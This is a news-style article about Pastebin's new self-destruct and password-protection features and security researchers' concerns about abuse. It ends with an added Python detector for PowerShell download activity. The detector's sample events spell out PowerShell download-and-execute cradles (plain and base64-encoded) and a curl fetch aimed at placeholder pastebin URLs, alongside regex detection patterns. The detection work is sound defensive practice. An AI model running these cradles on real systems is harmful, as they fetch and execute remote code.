Pastebin Adds Password Protection and Self-Destruct Features, Raising Security Concerns

Pastebin Introduces Password Protection and Self-Destruct Features

Last week, Pastebin, the world’s most popular paste site and one of the top 2,000 websites globally according to Alexa, rolled out two new features that have sparked criticism from cybersecurity experts. The new features—Burn After Read (self-destruct) and Password Protected Pastes—have long been available on other paste sites, but until recently, Pastebin had not implemented them.

Security Concerns Over New Features

The main issue is that Pastebin has already attracted criminals and hosts a significant amount of illegal content. Stolen data is regularly uploaded to the site, and attackers use it to host malware and code and as a repository for C&C server IP addresses, among other things. ZDNet quotes cybersecurity expert Ted Samuels, who notes that abuse on Pastebin is far from rare.

“Currently, Pastebin is the most popular paste site and a common platform for fileless attacks using PowerShell. For example, an attacker’s initial payload may use PowerShell to download additional (often obfuscated) content from pastebin.com for further execution via PowerShell. This method can even be used to load the CobaltStrike framework,” Samuels explains.

To combat this, many cybersecurity companies have developed tools that scrape new posts on Pastebin, searching for malware and sensitive data. These malicious pastes are then indexed, added to private threat databases, and brought to the attention of Pastebin’s administrators for removal.

Now, many experts are seriously concerned that Pastebin’s new features will hinder these tools, making it much harder to monitor new pastes in real time and potentially turning Pastebin into a haven for criminals.

Ongoing Tensions Between Pastebin and Security Experts

ZDNet points out that tensions between Pastebin and cybersecurity professionals have been high for some time. For example, earlier this year, Pastebin’s developers unexpectedly announced the discontinuation of their Scraping API, which experts used to detect threats as described above. After a strong negative reaction from the community, they reversed this decision. However, now that hackers can password-protect or self-destruct their pastes, the Scraping API may become almost useless for researchers, making the platform even less transparent.

Pastebin’s Response

Pastebin representatives told journalists that the new features were added in response to user requests.

“Pastebin stores important data for its users, ranging from calculations and engineering data like algorithms, logs from various services, robots, and network devices, to proprietary source code. We received many requests from users asking for these features to protect their privacy and help safeguard their work. Pastebin was created by developers for developers and is used by millions of people worldwide. Of course, every platform has bad actors who try to abuse its features, including GitHub, Twitter, Facebook, Dropbox, Privnotes, and Sendspace,” the company stated.

The developers also believe that cybersecurity experts are exaggerating the issue, noting that there are dozens of other paste sites, many of which are even more lenient about abuse. They also emphasized that they actively fight malicious content, cooperate with CERT, cybersecurity companies, and law enforcement agencies worldwide, and provide free access for researchers and academics.

Calls for Blocking Pastebin in Corporate Networks

Cybersecurity experts, for their part, have long argued that Pastebin and similar sites should be blocked on corporate networks. Since it is well known that these platforms are abused by malicious actors, they believe organizations should treat such resources accordingly.
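As an added example (not from the article, ZDNet or Pastebin), here is a small Python detector of the kind a corporate SOC could run over endpoint process-creation telemetry where outright blocking is not possible. It flags command lines that reference pastebin.com or that pair PowerShell with a download cradle, and it decodes `-EncodedCommand` arguments first so that base64 encoding cannot hide the domain from the match. The log lines, hostnames, users and paste IDs are constructed placeholders.

```python
import base64
import re

# Constructed sample only: builds the -EncodedCommand argument the way
# PowerShell expects it (base64 of the UTF-16LE script text).
def ps_encode(script):
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not real telemetry); paste IDs are placeholders.
SAMPLE_EVENTS = [
    {"host": "ws-017", "user": "jdoe", "cmd": r"notepad.exe C:\Users\jdoe\notes.txt"},
    {"host": "ws-017", "user": "jdoe", "cmd": "powershell.exe -nop -w hidden -c \"IEX "
     "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLEID1')\""},
    {"host": "srv-02", "user": "svc_build", "cmd": r"powershell.exe -File C:\build\deploy.ps1"},
    {"host": "ws-042", "user": "asmith", "cmd": "powershell.exe -w hidden -enc "
     + ps_encode("iwr https://pastebin.com/raw/EXAMPLEID2 | iex")},
    {"host": "ws-042", "user": "asmith", "cmd": r"curl.exe https://pastebin.com/raw/EXAMPLEID3 -o C:\Temp\x.txt"},
]

PASTE_HOST = re.compile(r"pastebin\.com", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.IGNORECASE)
# Common spellings of the encoded-command switch, followed by its base64 argument.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_encoded_command(cmd):
    """Return the decoded text of every -EncodedCommand argument found in cmd."""
    decoded = []
    for m in ENCODED_ARG.finditer(cmd):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64/UTF-16LE; the raw-text checks still apply
    return decoded

def classify(event):
    """Tag one event; the decoded command is inspected too, so encoding cannot hide the domain."""
    cmd = event["cmd"]
    views = [cmd] + decode_encoded_command(cmd)
    is_ps = any(p in cmd.lower() for p in ("powershell", "pwsh"))
    tags = []
    if any(PASTE_HOST.search(v) for v in views):
        tags.append("pastebin-url")
    if is_ps and any(DOWNLOAD_CRADLE.search(v) for v in views):
        tags.append("ps-download-cradle")
    if is_ps and ENCODED_ARG.search(cmd):
        tags.append("ps-encoded-command")
    return tags

def find_alerts(events):
    """Return (host, user, tags) for events that reach the paste site or run a PowerShell download cradle."""
    alerts = []
    for e in events:
        tags = classify(e)
        if "pastebin-url" in tags or "ps-download-cradle" in tags:
            alerts.append((e["host"], e["user"], tags))
    return alerts
```

Run over the five constructed events, the detector returns three alerts: the plain-text cradle, the encoded one (which a naive `pastebin.com` string match on the raw command line would miss), and the curl download.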
